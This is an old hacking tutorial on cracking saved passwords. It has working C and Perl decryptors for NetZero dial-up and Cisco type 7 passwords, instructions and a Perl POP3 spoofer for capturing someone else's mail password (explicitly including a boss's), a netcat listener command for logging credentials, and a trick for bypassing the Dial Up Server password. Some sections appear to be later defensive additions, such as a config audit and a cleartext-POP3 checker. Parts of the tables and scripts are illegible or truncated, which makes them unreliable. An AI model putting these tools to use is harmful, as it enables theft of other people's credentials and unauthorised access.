More Password Cracking Decrypted
By Ankit Fadia
Mailto: ankit@bol.net.in



Welcome to another edition of Password Cracking Decrypted. In this manual we will learn, you guessed it, how to crack passwords. In this edition we have explanations of how to break more kinds of passwords.

Although this manual is quite easy to understand, I would definitely like to make one suggestion. To truly enjoy reading this manual, you need to know C relatively well. However, even if you have no idea what C is, I assure you that this manual will definitely be of use to you.


Cracking the NetZero (Free ISP) Dial Up Password

Today, the number of Internet Service Providers (both free and the not so free ones) has really reached a very high figure. All of them aim at providing better services and making the process of connecting to the Internet easier for the user. One common practice amongst both Internet Service Providers and popular browsers like Internet Explorer is to offer an option called “Save Password”, which makes life easier for the user, as it allows the user to not type in the password each time he has to connect to the Internet.

Although, like all other software, as soon as the developer tries to add a user friendly feature or make the software easier to use or more efficient, he has to make at least some compromise in the security or safety field. One popular example would be Outlook Express: ever since the Preview Pane was introduced within the email client, Outlook Express users have become prone to Email-Borne Viruses.

Anyway, getting back to the subject of this tutorial, including the “Save Password” feature has made the User’s Password unsafe. Now, what happens is that, when you check this option or enable it, the concerned software (Browser or Internet Service Provider Software) takes the password and passes it through an algorithm to encrypt it. Once the Password is encrypted, it is then stored in the Windows Registry or in some .ini or .dat or a similar file. Now, this system sounds quite safe; however, if you look deeper, you find that it is trouble waiting to happen.

The very fact that the encrypted password has to be stored somewhere makes this feature vulnerable. Also, almost all software providing this feature does not use a strong algorithm. This makes the work of a hacker really easy. Some software even stores the password as plaintext in the registry. So, basically the weakest link in this feature is that most software developers are unaware of the fact that the encrypted password can be easily decrypted once we study the software inside out. So, what I mean to say is that using this feature surely makes life easy for those of you who cannot remember passwords, but it does leave your Internet Account vulnerable. However, if you are one of those people who needs to write down your password on a piece of paper and stick it to the front of your monitor, then this feature is definitely for you.

So how do I crack the NetZero Dial Up Password?

Anyway, NetZero is a free ISP, which asks only for an advertising bar in return for Internet Access. It too provides this “Save Password” feature; however, like most services, it uses an extremely weak algorithm to encrypt the password. The following process of decryption works on NetZero version 3.0 and earlier and requires Win 9x, NT or Win 2K to be running.

For this exploit, you need to have local access to the machine which has the NetZero software installed.

This vulnerability cannot be exploited unless and until you get the required file; for that you either have to have local access or need to devise a method of getting the file which contains the password.

The NetZero Username and Password are stored in an ASCII file named id.dat, which is located in the NetZero directory. If the user has enabled the “Save Password” option, then the Username and Password are also stored in the jnetz.prop file. The passwords stored in both these files are encrypted using a very simple, easy to crack algorithm. Although the algorithms used to get the encrypted information (to be stored in the two files) are not the same, they are derived from the same main algorithm; both algorithms differ very slightly. In this manual we will learn how this weak algorithm can be exploited.

The NetZero Password is encrypted using a substitution cipher system. The cipher system used is a typical example of a 1 to 1 mapping between characters, where each single plaintext character is replaced by a single encrypted character.


Are you lost? Well, to understand better read on.

Say the NetZero application is running, and the user clicks on the “Save Password” option and types his password in the required field. What happens then is that the NetZero Application loads the encrypting file, which contains the plaintext to cipher-text database, into memory. Now, for example, if your password is xyz and it is stored in location “m” of the memory and the corresponding encrypted password abc is stored in the location “n” of the memory, then the password xyz is actually stored as abc.

Well it is quite simple, right? Well, almost. The part of the encryption algorithm used by NetZero which is difficult to understand is that two encrypted characters replace each character of the plaintext password. These two encrypted characters replacing a single plaintext character are, however, not stored together.

When substituting character x stored at position i of a password “n” characters long, the first encrypted character would be stored at “i” and the next at “n+i”.

The two encrypted characters are derived from the following table (three column headers and two row headers are not legible in this copy and are shown as ??):

         1   a   M   ??  f   ??  g   T   9   4   ??  W   e   6   y   C
     ------------------------------------------------------------------
   g |   `   a   b   c   d   e   f   g   h   i   j   k   l   m   n   o
   T |   p   q   r   s   t   u   v   w   x   y   z   {   |   }   ~   DEL
   f |   @   A   B   C   D   E   F   G   H   I   J   K   L   M   N   O
   ??|   P   Q   R   S   T   U   V   W   X   Y   Z   [   \   ]   ^   _
   ??|   0   1   2   3   4   5   6   7   8   9   :   ;   <   =   >   ?
   M |   P   !   "   #   $   %   &   '   (   )   *   +   ,   -   .   /

NOTE: P in the last row represents a single space, DEL represents the delete character (ASCII 127), and the above chart represents ASCII characters; each row is one block of sixteen consecutive ASCII codes.

To encrypt a string of length “n”, we need to find each character in the above table and place the column header at position i and the row header at position n+i.

For example (?? stands for a header that is not legible in this copy):

  E(a) = ag
  E(aa) = aagg
  E(aqAQ1!) = aaaaaagTf????M
  E(`abcdefghijklmno) = 1aM??f??gT94??We6yC followed by sixteen g characters

On the other hand, when decrypting an encrypted password of length 2n, character i of the plaintext becomes the element of the above table where the column headed by encrypted character i and the row headed by encrypted character n+i intersect.

For example:

  D(af) = A
  D(aaff) = AA
  D(aaMM????fgfgfg) = AaBbCc

Decrypting the password manually would be quite fun, but would definitely be a very time consuming process. Anyhow, I do suggest you try to decrypt the NetZero Password manually at least once. For those of you who do not enjoy decrypting passwords manually, I also have a C program which will do it for you.
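The codebook described above, written out as an encode/decode pair so the i / n+i layout and the fixed table can be checked against the page's own E() and D() examples. This is an added example, not code from the page, from NetZero or from @stake; it assumes the three column headers and two row headers that are not legible in this copy (represented as None and rejected), and the observation, taken from the table, that every row is a block of sixteen consecutive ASCII codes.

```python
# Added example: NetZero "two characters per plaintext character" codebook.
# Three column headers and two row headers were not legible in the source;
# they are None here (assumption: unknown) and such cells are rejected.

COL_HEADERS = ['1', 'a', 'M', None, 'f', None, 'g', 'T', '9', '4', None,
               'W', 'e', '6', 'y', 'C']
ROW_HEADERS = ['g', 'T', 'f', None, None, 'M']

# Each row of the table is one block of sixteen consecutive ASCII codes:
# row g = 0x60..0x6F, T = 0x70..0x7F, f = 0x40..0x4F, ?? = 0x50..0x5F,
# ?? = 0x30..0x3F, M = 0x20..0x2F (same order as ROW_HEADERS).
ROW_BASES = [0x60, 0x70, 0x40, 0x50, 0x30, 0x20]


def _lookup(ch):
    """Return (row, col) of a plaintext character in the table, or None if
    the character lies outside the six 16-character blocks it covers."""
    code = ord(ch)
    for row, base in enumerate(ROW_BASES):
        if base <= code < base + 16:
            return row, code - base
    return None


def nz_encode(plain):
    """E(): all column headers first, then all row headers, so plaintext
    character i is spread over cipher positions i and n+i."""
    cols, rows = [], []
    for ch in plain:
        pos = _lookup(ch)
        if pos is None:
            raise ValueError("character not in table: %r" % ch)
        row, col = pos
        if COL_HEADERS[col] is None or ROW_HEADERS[row] is None:
            raise ValueError("header for %r not legible in the source" % ch)
        cols.append(COL_HEADERS[col])
        rows.append(ROW_HEADERS[row])
    return "".join(cols) + "".join(rows)


def nz_decode(cipher):
    """D(): pair cipher position i with position n+i and read the cell.
    There is no key: anyone holding the file can reverse it."""
    if len(cipher) % 2:
        raise ValueError("cipher text must have even length")
    n = len(cipher) // 2
    out = []
    for i in range(n):
        col = COL_HEADERS.index(cipher[i])       # ValueError on unknown header
        row = ROW_HEADERS.index(cipher[n + i])
        out.append(chr(ROW_BASES[row] + col))
    return "".join(out)


if __name__ == "__main__":
    for p in ("a", "aa", "Aa", "windy"):
        print("E(%s) = %s" % (p, nz_encode(p)))
    print("D(af) =", nz_decode("af"))
```

The round trip on "windy" only uses headers that survived in the table; a character whose header is lost (for example "s") is refused rather than guessed.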


The following C program demonstrates how the NetZero Password is decrypted. Simply compile and execute it in the directory in which jnetz.prop exists.



#include <stdio.h>
#include <string.h>

#define UID_SIZE 64
#define PASS_CIPHER_SIZE 128
#define PASS_PLAIN_SIZE 64
#define BUF_SIZE 256

/* One row per row header of the table (g, T, f, ??, ??, M); each row is a
   block of sixteen consecutive ASCII characters. '\x7f' is DEL. */
const char decTable[6][16] = {
  {'`','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o'},
  {'p','q','r','s','t','u','v','w','x','y','z','{','|','}','~','\x7f'},
  {'@','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O'},
  {'P','Q','R','S','T','U','V','W','X','Y','Z','[','\\',']','^','_'},
  {'0','1','2','3','4','5','6','7','8','9',':',';','<','=','>','?'},
  {' ','!','"','#','$','%','&','\'','(',')','*','+',',','-','.','/'}
};

/* Decrypt cCipherPass (2n characters: n column headers followed by n row
   headers) into cPlainPass. Returns 0 on success, 1 on error. */
int nz_decrypt(char cCipherPass[PASS_CIPHER_SIZE],
               char cPlainPass[PASS_PLAIN_SIZE])
{
  int passLen, i, idx1, idx2;

  passLen = strlen(cCipherPass) / 2;

  if (passLen >= PASS_PLAIN_SIZE) {
    printf("Error: Plain text array too small\n");
    return 1;
  }

  for (i = 0; i < passLen; i++) {
    /* first half of the cipher text: column index */
    switch (cCipherPass[i]) {
      case '1': idx2 = 0; break;
      case 'a': idx2 = 1; break;
      case 'M': idx2 = 2; break;
      /* case for column 3: header not legible in this copy */
      case 'f': idx2 = 4; break;
      /* case for column 5: header not legible in this copy */
      case 'g': idx2 = 6; break;
      case 'T': idx2 = 7; break;
      case '9': idx2 = 8; break;
      case '4': idx2 = 9; break;
      /* case for column 10: header not legible in this copy */
      case 'W': idx2 = 11; break;
      case 'e': idx2 = 12; break;
      case '6': idx2 = 13; break;
      case 'y': idx2 = 14; break;
      case 'C': idx2 = 15; break;
      default:
        printf("Error: Unknown Cipher Text index: %c\n", cCipherPass[i]);
        return 1;
    }

    /* second half of the cipher text: row index */
    switch (cCipherPass[i + passLen]) {
      case 'g': idx1 = 0; break;
      case 'T': idx1 = 1; break;
      case 'f': idx1 = 2; break;
      /* case for row 3: header not legible in this copy */
      /* case for row 4: header not legible in this copy */
      case 'M': idx1 = 5; break;
      default:
        printf("Error: Unknown Cipher Text Set: %c\n", cCipherPass[i + passLen]);
        return 1;
    }

    cPlainPass[i] = decTable[idx1][idx2];
  }

  cPlainPass[i] = 0;
  return 0;
}

int main(void)
{
  FILE *hParams;
  char cBuffer[BUF_SIZE], cUID[UID_SIZE];
  char cCipherPass[PASS_CIPHER_SIZE], cPlainPass[PASS_PLAIN_SIZE];
  int done = 2;

  printf("\nNetZero Password Decryptor\n");
  printf("Brian Carrier [bcarrier@atstake.com]\n");
  printf("@stake L0pht Research Labs\n\n");

  if ((hParams = fopen("jnetz.prop", "r")) == NULL) {
    printf("Unable to find jnetz.prop file\n");
    return 1;
  }

  while ((fgets(cBuffer, BUF_SIZE, hParams) != NULL) && (done > 0)) {
    /* strip the line ending that fgets leaves in the buffer */
    cBuffer[strcspn(cBuffer, "\r\n")] = 0;

    if (strncmp(cBuffer, "ProfUID=", 8) == 0) {
      strncpy(cUID, cBuffer + 8, UID_SIZE - 1);
      cUID[UID_SIZE - 1] = 0;
      printf("UserID: %s\n", cUID);
      done--;
    }

    if (strncmp(cBuffer, "ProfPWD=", 8) == 0) {
      strncpy(cCipherPass, cBuffer + 8, PASS_CIPHER_SIZE - 1);
      cCipherPass[PASS_CIPHER_SIZE - 1] = 0;
      printf("Encrypted Password: %s\n", cCipherPass);

      if (nz_decrypt(cCipherPass, cPlainPass) != 0) {
        fclose(hParams);
        return 1;
      }
      printf("Plain Text Password: %s\n", cPlainPass);
      done--;
    }
  }

  fclose(hParams);

  if (done > 0) {
    printf("Invalid jnetz.prop file\n");
    return 1;
  } else {
    return 0;
  }
}






More NetZero Fun

Reinaldo Trujilo Adds:

(Characters that are not legible in this copy are shown as ?.)

Today we're going to tear apart the NetZero logon password. Things you must keep in mind.

1. password format: 0,n,i-n,1
2. based on the 0 counting system..ie. 0,1,2,3,4,5,etc
3. all passwords begin with a 0 and end with a 1

5. now to get the second character we have a special equation "i-n=V" where "i" is the plaintext character, "n" is that character's numerical value, and V is the new encrypted value.

  a m o r e
  0 1 2 3 4      <--the N values.(ie.N value for "m" is 1)
  0 a       1    <--encrypted password

now we go to the chart and find "m". You'll find that m=} but since our equation tells us that i-n=V we get our answer like this. m-1=l so our encrypted value for "m" now equals "?". so our encrypted password now looks like this

  a m o r e
  0 1 2 3 4      <--N values
  0 a ?     1    <--Encrypted password

6. now we do the same thing for letter "o". o-2=m. "o" now equals "}"

  a m o r e
  0 1 2 3 4      <--N values
  0 a ? }   1    <--encrypted password

7. do the same for "r". r-3=o. "r" now equals "?"

  a m o r e
  0 1 2 3 4      <--N values
  0 a ? } ? 1    <--encrypted password

8. and now our last value "e". e-4=a. "e" now equals "a"

  a m o r e
  0 1 2 3 4      <--N values
  0 a ? } ? a 1  <--Our full encrypted password

Result amore= 0a?}?a1

I hope this has been useful. Enjoy.

Now you can type your encrypted password into the password field of your dialup program instead of having to use netzero's software.

P.S. one more thing.. the user name also has a special format. it goes:

example if your user name is BigDaddy you'd put this in the user field of your dialup program

P.S.S. very important..i almost forgot, say you get the letter "b" as the 5th letter of your password, according to the chart(above) there is no more spaces to move to. so what you do is follow the chart below like this

a a a a a b a a a a  a  a  a  a  a  a  a  a  a  a  a   <--original plaintext
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20  <--N values

a b c d e f g h i j  k  l  m  n  o  p  q  r  s  t  u   <--password format

so "b" is the 5th letter. now its N value should be equal to "f" but since there is a "b" is the second letter in the password format alphabet its N value gets shifted back one space (remember we're on the 0 counting system b=1 not 2). If 5th letter happened to be a "c" its N value would have been shifted back two spaces. etc etc. Then you would just go on encrypting the password as normal.

in short, you take the original plaintext letter's N value (5 in this case) and you subtract that letter's N value (1 in this case) in the password format to get the new N value (4 in this case, which would make the new letter "e").

Hopefully this cleared up what i meant, keep in mind that you only reference this second chart below when you get a letter in the original plaintext format whose plaintext N value is greater than its password format N value


HACKING TRUTH: By default Windows accepts both short and long passwords as the Windows login password. Some users use extremely short passwords, which can easily be brute forced. So in order to set the minimum number of characters, or the minimum length of the password, simply follow the following registry trick:

Launch the Windows Registry Editor, i.e. c:\windows\regedit.exe

Scroll down to the following registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network

Click on Edit > New > DWORD Value.

Name this new DWORD value MinPwdLen and in the data field enter the minimum number of characters the password has to be. One thing to note here is that this value is in Hexadecimal. Now, press F5 and your system just became a tiny bit securer, but certainly not unhackable.


Cracking CISCO Router Passwords

Cisco Router hacking is considered to be extra elite and really kewl. It is really a great exercise for your gray cells, especially if the target system has Kerberos, a Firewall and some other Network Security software installed. Anyway, almost always the main motive behind getting root on a system is to get the password file. Once you get the Router password file, then you need to be able to decrypt the encrypted passwords stored by it. Well, in this section, we will learn just that. The following is a C program which demonstrates how to decrypt a CISCO password.

_______________________________

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* constant key stream used by the Cisco type 7 scheme */
char xlat[] = {
  0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
  0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
  0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};

char pw_str1[] = "password ";
char pw_str2[] = "enable-password ";

char *pname;

/* Decode a type 7 string: two decimal digits of seed (an offset into xlat),
   then one hex byte per password character, each XORed with xlat[seed++].
   Returns 0 on success, -1 on a malformed string. */
int cdecrypt(char *enc_pw, char *dec_pw)
{
  unsigned int seed, i, val = 0;

  if (strlen(enc_pw) & 1)
    return (-1);

  if (!isdigit((unsigned char)enc_pw[0]) || !isdigit((unsigned char)enc_pw[1]))
    return (-1);

  seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';

  if (seed > 15)
    return (-1);

  for (i = 2; i <= strlen(enc_pw); i++) {
    if (i != 2 && !(i & 1)) {
      if (seed >= sizeof(xlat))   /* password longer than the key stream */
        return (-1);
      dec_pw[i / 2 - 2] = val ^ xlat[seed++];
      val = 0;
    }

    val *= 16;

    if (isdigit(enc_pw[i] = toupper((unsigned char)enc_pw[i]))) {
      val += enc_pw[i] - '0';
      continue;
    }

    if (enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
      val += enc_pw[i] - 'A' + 10;
      continue;
    }

    if (strlen(enc_pw) != i)
      return (-1);
  }

  dec_pw[strlen(enc_pw) / 2 - 1] = 0;   /* terminate after the last decoded byte */

  return (0);
}

void usage(void)
{
  fprintf(stdout, "Usage: %s -p encrypted_password\n", pname);
  fprintf(stdout, "       %s config_file [output_file]\n", pname);
}

int main(int argc, char **argv)
{
  FILE *in = stdin, *out = stdout;
  char line[257];
  char passwd[65];
  unsigned int i, pw_pos;

  pname = argv[0];

  if (argc > 1) {
    if (argc > 3) {
      usage();
      exit(1);
    }

    if (argv[1][0] == '-') {
      switch (argv[1][1]) {
        case 'h':
          usage();
          break;

        case 'p':
          if (argc < 3 || cdecrypt(argv[2], passwd)) {
            fprintf(stderr, "Error.\n");
            exit(1);
          }
          fprintf(stdout, "password: %s\n", passwd);
          break;

        default:
          fprintf(stderr, "%s: unknown option.\n", pname);
      }

      return (0);
    }

    if ((in = fopen(argv[1], "rt")) == NULL)
      exit(1);
    if (argc > 2)
      if ((out = fopen(argv[2], "wt")) == NULL)
        exit(1);
  }

  /* read the config line by line; lines carrying a type 7 password are
     written out with the decoded password, all others are echoed */
  while (1) {
    for (i = 0; i < 256; i++) {
      int c = fgetc(in);
      if (c == EOF) {
        if (i)
          break;

        fclose(in);
        fclose(out);
        return (0);
      }
      line[i] = (char)c;
      if (line[i] == '\r')
        i--;

      if (line[i] == '\n')
        break;
    }
    pw_pos = 0;
    line[i] = 0;

    if (!strncmp(line, pw_str1, strlen(pw_str1)))
      pw_pos = strlen(pw_str1);

    if (!strncmp(line, pw_str2, strlen(pw_str2)))
      pw_pos = strlen(pw_str2);

    if (!pw_pos) {
      fprintf(stdout, "%s\n", line);
      continue;
    }

    if (cdecrypt(&line[pw_pos], passwd)) {
      fprintf(stderr, "Error.\n");
      exit(1);
    } else {
      if (pw_pos == strlen(pw_str1))
        fprintf(out, "%s", pw_str1);
      else
        fprintf(out, "%s", pw_str2);

      fprintf(out, "%s\n", passwd);
    }
  }
}
______________________________


NOTE: The above works only on a Linux platform. If you are running Windows, then you will have to use some brute force password cracker.


Bypassing the Dial Up Server Password

Those of you who have used File Sharing must certainly have heard about the Dial Up Server software or utility. Now, this too can be password protected. Now, say you have password protected the Dial Up Server and have forgotten the password, or someone has changed it; then no one can dial into your system. What do you do?

Like all password protection features in Win 9x systems, this too can easily be bypassed or changed. You do not need to know the previous old password to perform this hack. Simply delete the file RNA.pwl in the c:\windows directory and the next time you use Dial Up Server, you will find that it will either ask you to enter a new password or simply not ask for a password at all.


Cracking Outlook Express’s Password

After I released the first edition of Password Cracking Decrypted Revisited, I got a lot of mails from people asking me questions, like where Outlook Express stores the Dial Up Password and how to decrypt it, or how to get the Outlook Express password of my boss, who is on the same LAN. Well, this edition will to a certain extent answer all such questions.

Outlook Express too, like Internet Explorer and a number of other Dial Up Software, provides the user with the option of “Save Password.” This option, although it makes connecting to the net easy, is really a stupid security loophole and makes the password of the User vulnerable to being cracked.

Outlook Express stores the Dial Up Networking or DUN Password in the registry, under the following key:

HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts

Well, actually the above key has a number of sub keys, which correspond to and store information on various Internet Connection Accounts. The Accounts (information and configuration details) are stored as 00000001 for the first account, 00000003 for the third and so on.

Clicking on any of these Account Keys will display a number of DWORD, String and Binary values in the right pane. All these values store configuration details about how your Internet Connection Account works. However, the value in which we are really interested is only the POP3 Password2 value.

POP3 Password2 is the DWORD value which stores your Internet Connection Password. Actually, it is not only Outlook which uses this key, but the Internet Connection Wizard, under which both Outlook and Internet Explorer come.

Anyway, now, once I did find out the key of Outlook Express, I racked my brains to figure out the algorithm to decrypt the password so as to get the plaintext one, but somewhere along the way, when I was experimenting for another of my tutorials, I found out a way which would be much easier to get the Outlook Password. It requires no coding, no fancy C code editing and has no Mathematics or algorithms involved.

HACKING TRUTH: Common paths where some passwords are stored by various applications:

Outlook Express / Internet Explorer --- HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts

Panda Antivirus: HKEY_LOCAL_MACHINE\SOFTWARE\Panda Software\Panda Antivirus 6.0

Shares: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetDDE

Screen Saver: c:\windows\user.dat

Well, before we go on to the actual process, let us understand what Outlook usually does while connecting to your mail server and downloading your email. Now, when you click on Send and Receive, Outlook Express connects to Port 110 of your Mail server and the following set of POP command exchange takes place between your system and the POP daemon of the mail server:

+OK POP (version 2.53) at delhi1.mtnl.net.in starting.
USER ankit
+OK Password required for ankit.
PASS abc
+OK ankit has xx messages (yyyyy octets).

So, this means that firstly, as soon as the daemon banner comes up, Outlook sends your Username to the mail server; then once the Password required Message comes up, Outlook sends your password. This in turn means that your password is being sent to the remote system and (I am sure almost all of you have guessed it by now) if this remote system has a port listener installed, then you can get both the User name and Password.

So what you have to do is:

1.) Change Outlook Express’s Mail Server setting to point to a local machine or a machine where you are able to install and run a port listener.

2.) Connect to the Internet and click on Send/Receive just as you normally do, and voila, the listener gets the password for you. It is as simple as that.

This technique works with almost all email clients including Netscape Messenger. It will not work only with those clients which ask for a password before you are able to change the mail server settings.
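The exchange shown above, looked at from the defender's side: a small checker that reads a captured POP3 session and reports whether the credentials crossed the wire in clear text (USER/PASS with no STLS) or by a digest (APOP). This is an added example, not part of the original text; the session lines are constructed from the exchange printed above, the server name and user are the ones in the text, and the message counts are placeholders.

```python
# Added example: classify how a captured POP3 session authenticated.
# The capture format (lines prefixed "C: " / "S: ") is an assumption of this
# example; the session below is constructed from the exchange in the text.

SESSION = """\
S: +OK POP (version 2.53) at delhi1.mtnl.net.in starting.
C: USER ankit
S: +OK Password required for ankit.
C: PASS abc
S: +OK ankit has 12 messages (34567 octets).
"""


def analyse_pop3(capture):
    """Walk the client turns and classify the authentication.

    Returns a dict with the method seen ('USER/PASS', 'APOP', 'STLS' or
    None), the user name, and whether the password itself was visible."""
    result = {"method": None, "user": None,
              "cleartext_password": False, "tls": False}
    for line in capture.splitlines():
        if not line.startswith("C: "):
            continue
        cmd, _, arg = line[3:].partition(" ")
        cmd = cmd.upper()
        if cmd == "STLS":
            # everything after a successful STLS is encrypted, so a PASS
            # seen before it is the only one a listener could read
            result["tls"] = True
            result["method"] = "STLS"
        elif cmd == "USER":
            result["user"] = arg
        elif cmd == "PASS":
            result["method"] = "USER/PASS"
            result["cleartext_password"] = not result["tls"]
        elif cmd == "APOP":
            # APOP sends an MD5 digest of a server nonce and the password,
            # not the password itself
            result["user"] = arg.split(" ")[0]
            result["method"] = "APOP"
    return result


def report(capture):
    """One-line finding for a session, in the shape a log review would want."""
    r = analyse_pop3(capture)
    if r["cleartext_password"]:
        return "ALERT: user %s authenticated with USER/PASS in clear text" % r["user"]
    return "ok: method=%s user=%s" % (r["method"], r["user"])


if __name__ == "__main__":
    print(report(SESSION))
```

Run over the page's own exchange the checker raises the alert; the same function returns "ok" for a constructed APOP session, which is the property a mail administrator would want to confirm before allowing password caching in clients.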


Where do I get a Port Listener? Well, you can get them, as well as all the Hacking utilities you need, from either www.anticode.com or packetstorm.securify.com

However, again nothing is more enjoyable and satisfactory than to write your own Port Listener. It can easily be written in either C or Perl. In fact the following is a Perl script which acts as a port listener:



# This is a simple tcp server that listens on port 110
# unless another is specified.
# The possible uses of this are;
# Netscape/explorer mail password caching/grabbing
# In netscape edit your prefs.js file so that your pop
# server is your own ip (127.0.0.1) then open netscape
# and click on get mail then this will capture the user.name
# and password. (ps- dont edit your pop account in netscape
# or it will erase the password and prompt for a new one)

# I havent got explorer but the pop server can be changed in
# the registry same should work for other email clients that
# allow password caching.

# Most of this coding was already in the perl/eg folder
# you can find the orginal version there ..

print "===========================\n";
print " Manicx local POP3 spoofer\n";
print " www.infowar.co.uk/manicx\n";
print "===========================\n";

($port) = @ARGV;
$port = 110 unless $port;     # Our port is 110 unless specified

$AF_INET = 2;
$SOCK_STREAM = 1;

$sockaddr = 'S n a4 x8';

($name, $aliases, $proto) = getprotobyname('tcp');
if ($port !~ /^\d+$/) {
    ($name, $aliases, $port) = getservbyport($port, 'tcp');
}

print "Port = $port\n";

$this = pack($sockaddr, $AF_INET, $port, "\0\0\0\0");

select(NS); $| = 1; select(stdout);

socket(S, $AF_INET, $SOCK_STREAM, $proto) || die "socket: $!";
bind(S, $this) || die "bind: $!";
listen(S, 5) || die "connect: $!";

select(S); $| = 1; select(stdout);

print "Listening for connection....\n";

($addr = accept(NS, S)) || die $!;

print "Accept ok\n";

($af, $port, $inetaddr) = unpack($sockaddr, $addr);
@inetaddr = unpack('C4', $inetaddr);

print NS "+OK manicx POP3 sniffer ready.\n";

getuserandpass();   # call on our sub
bluffothers();      # call on other sub

#-------------------------------------
sub bluffothers {
    $cmd = <NS>;
    # (the copy of the script reproduced here ends at this point; the rest
    # of this sub and the getuserandpass sub are not included)


Now, say you do not want to run the above program or somehow do not like the idea of working with a port listener; then you can use a very interesting tool by L0pht.com called Netcat. This tool is really very amazing and before you read this manual further, I suggest you read its documentation at l0pht.com, as I will not be discussing its various interesting options in this manual.

Anyway, the following command will create a simple Port Listener sort of utility, which will listen on the specified port and will record all data sent to it in the log file specified.

C:\>nc -l -p xx > file

Where xx is the port number which has to be listened on, and file is the path of the log file where all keystrokes, or everything entered by the person who connected to Port xx, are recorded.

Note: The ‘-l’ option listens for connections, while ‘-p xx’ is used to specify the port to which you want Netcat to bind.

Now, in our case, we want to bind Netcat to Port 110, listen for connections and record all keystrokes, so we use the following command:

C:\>nc -l -p 110 > log.txt

Well, actually all the methods described in this manual to steal the passwords stored by software which has the “Save Password” feature are not really needed. Almost all passwords including Windows Login, Outlook Express, DUN and a few others will easily get unmasked by using programs like Revelation.

Such a program will basically convert the “****”s to plaintext. You can get it at: Revelation.


Cracking the CISCO IOS Password

The following Perl Script demonstrates how to decrypt the CISCO IOS passwords.

#!/usr/bin/perl -w
# $Id: iosdecrypt.pl,v 1.1 1998/01/11 21:31:12 mesrik Exp $
#
# Credits for orginal code and description hobbit@avian.org,
# SPHiXe, .mudge et al. and for John Bashinski <jbash@CISCO.COM>
# for Cisco IOS password encryption facts.
#
# Use for any malice or illegal purposes strictly prohibited!
#

# constant key stream of the type 7 scheme
@xlat = ( 0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f, 0x41,
          0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72, 0x6b, 0x6c,
          0x64, 0x4a, 0x4b, 0x44, 0x48, 0x53, 0x55, 0x42 );

# read a config on stdin (or from the files named on the command line) and
# replace every type 7 password with its decoded value
while (<>) {
    if (/(password|md5)\s+7\s+([\da-f]+)/io) {
        if (!(length($2) & 1)) {
            $ep = $2; $dp = "";
            ($s, $e) = ($2 =~ /^(..)(.+)/o);
            for ($i = 0; $i < length($e); $i += 2) {
                $dp .= sprintf "%c", hex(substr($e, $i, 2)) ^ $xlat[$s++];
            }
            # (the copy on this page is cut off after the line above; the
            # substitution, closing braces and print below restore the loop)
            s/7\s+$ep/$dp/;
        }
    }
    print;
}
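Both the C program in the router section above and the Perl script just shown decode the same type 7 scheme. The following is an added example, not code from the page, from Cisco or from either author: it implements the decode, adds the encode direction (which makes clear that the two-digit "seed" is only an offset into a constant table, so no secret is involved), and runs an audit over constructed config lines that separates type 0 (clear), type 7 (reversible) and type 5 (hashed) entries. The key stream is the 26-byte xlat table from the Perl script; the sample configuration and its hash value are made up.

```python
# Added example: Cisco type 7 encode/decode plus a config audit.
import re

# 26-byte key stream as listed in the Perl script on this page
XLAT = bytes([0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f, 0x41,
              0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72, 0x6b, 0x6c,
              0x64, 0x4a, 0x4b, 0x44, 0x48, 0x53, 0x55, 0x42])


def type7_decode(enc):
    """Two decimal digits of seed, then one hex byte per character, each
    XORed with XLAT[seed + position]. The table is constant: no key."""
    if len(enc) < 4 or len(enc) % 2 or not enc[:2].isdigit():
        raise ValueError("malformed type 7 string")
    seed = int(enc[:2])
    data = bytes.fromhex(enc[2:])
    if seed + len(data) > len(XLAT):
        raise ValueError("password longer than the known key stream")
    return bytes(b ^ XLAT[seed + i] for i, b in enumerate(data)).decode("ascii")


def type7_encode(password, seed):
    """Inverse of type7_decode. The same password with another seed gives a
    different string; that offset is the scheme's only variation."""
    data = password.encode("ascii")
    if not 0 <= seed <= 15 or seed + len(data) > len(XLAT):
        raise ValueError("bad seed or password too long for the key stream")
    return "%02d" % seed + "".join("%02X" % (b ^ XLAT[seed + i])
                                   for i, b in enumerate(data))


# IOS lines carrying a password: "[enable] password|secret <type> <value>"
# and "username <name> password|secret <type> <value>" (assumed formats)
PW_LINE = re.compile(r"^\s*(?:enable\s+)?(?:password|secret)\s+(\d)\s+(\S+)", re.I)
USER_LINE = re.compile(r"^\s*username\s+(\S+)\s+(?:password|secret)\s+(\d)\s+(\S+)", re.I)


def audit_config(text):
    """Return (line number, finding, value) per password line: type 0 is
    cleartext, type 7 is reversible (decoded to show the exposure), and any
    other type is treated as a one-way hash."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = USER_LINE.match(line) or PW_LINE.match(line)
        if not m:
            continue
        ptype, value = m.groups()[-2:]
        if ptype == "0":
            findings.append((lineno, "cleartext", value))
        elif ptype == "7":
            findings.append((lineno, "reversible", type7_decode(value)))
        else:
            findings.append((lineno, "hashed", None))
    return findings


# constructed sample; the type 5 hash is a placeholder, not a real digest
SAMPLE_CONFIG = """\
hostname edge-router
enable password 7 094F471A1A0A
enable secret 5 $1$EXAMPLE$hashplaceholder
username admin password 0 letmein
line vty 0 4
 password 7 11081D081E1C
"""

if __name__ == "__main__":
    for lineno, finding, value in audit_config(SAMPLE_CONFIG):
        print("line %d: %s %s" % (lineno, finding, value or ""))
```

The audit is the check worth automating: any "reversible" or "cleartext" finding means the value should be replaced by an enable secret (type 5 or stronger), and service password-encryption alone does not change that, since it only produces type 7.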









Cracking the MacOS Password

